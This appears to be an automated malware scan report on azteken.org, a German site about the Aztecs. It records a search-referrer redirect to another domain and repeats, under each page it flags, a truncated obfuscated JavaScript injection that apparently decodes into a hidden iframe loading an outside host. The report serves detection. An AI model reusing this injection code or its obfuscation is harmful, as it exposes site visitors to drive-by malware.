Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://azteken.org/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: azteken.org Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 10:44:31 GMT Location: http://candice-accola.org/mocf.html?h=1387075 Server: Apache Content-Length: 290 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://azteken.org/ | 200 OK Content-Length: 19028 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-3"> <h2>Azteken</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://azteken.org/tenochtitlan | 200 OK Content-Length: 18960 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-41"> <h2>Tenochtitlan</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/tlatelolco | 200 OK Content-Length: 18075 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-126"> <h2>Tlatelolco</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/religion-und-opferungen | 200 OK Content-Length: 18618 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-25"> <h2>Religion und Opferung</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/azteken-in-der-freizeit | 200 OK Content-Length: 17581 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-137"> <h2>Azteken in der Freizeit</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/aztekische-bevolkerung | 200 OK Content-Length: 21211 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-14"> <h2>Die Bevölkerung</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/das-aztekische-kind | 200 OK Content-Length: 17443 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-22"> <h2>Das aztekische Kind</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/aztekischer-kalender | 200 OK Content-Length: 18622 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-49"> <h2>Aztekischer Kalender</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/azteken-fachbucher | 200 OK Content-Length: 20101 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-162"> <h2>Azteken - Fachbücher</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/aztekischer-alltag | 200 OK Content-Length: 18383 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-19"> <h2>Aztekischer Alltag</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/untergang-des-aztekenreiches | 200 OK Content-Length: 16816 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-64"> <h2>Untergang des Aztekenreiches</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/out/alfahosting.html | 404 Not Found Content-Length: 14302 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <h2 class="center">Error 404 - Not Found</h2> </div> <div id="sidebar"> <div class='sidebarad'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "1764018963"; google_ad_width = 120; google_ad_height = 240; Antivirus reports:
| ||
http://azteken.org/impressum | 200 OK Content-Length: 21100 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <div class="post" id="post-5"> <h2>Impressum</h2> <div class="entry"> <div class='rectangle'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "6069181457"; google_ad_width = 250; google_ad_height = 250; Antivirus reports:
| ||
http://azteken.org/test404page.js | 404 Not Found Content-Length: 14302 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6c,64,63,6b,66,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6c,64,63,6b,66,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5f,66,5a,5f,71,5c <div id="content" class="narrowcolumn"> <h2 class="center">Error 404 - Not Found</h2> </div> <div id="sidebar"> <div class='sidebarad'> <script type="text/javascript"><!-- google_ad_client = "pub-7967549832655391"; google_ad_slot = "1764018963"; google_ad_width = 120; google_ad_height = 240; Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=azteken.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://azteken.org/
Result: azteken.org is not infected or malware details are not published yet.
Result: azteken.org is not infected or malware details are not published yet.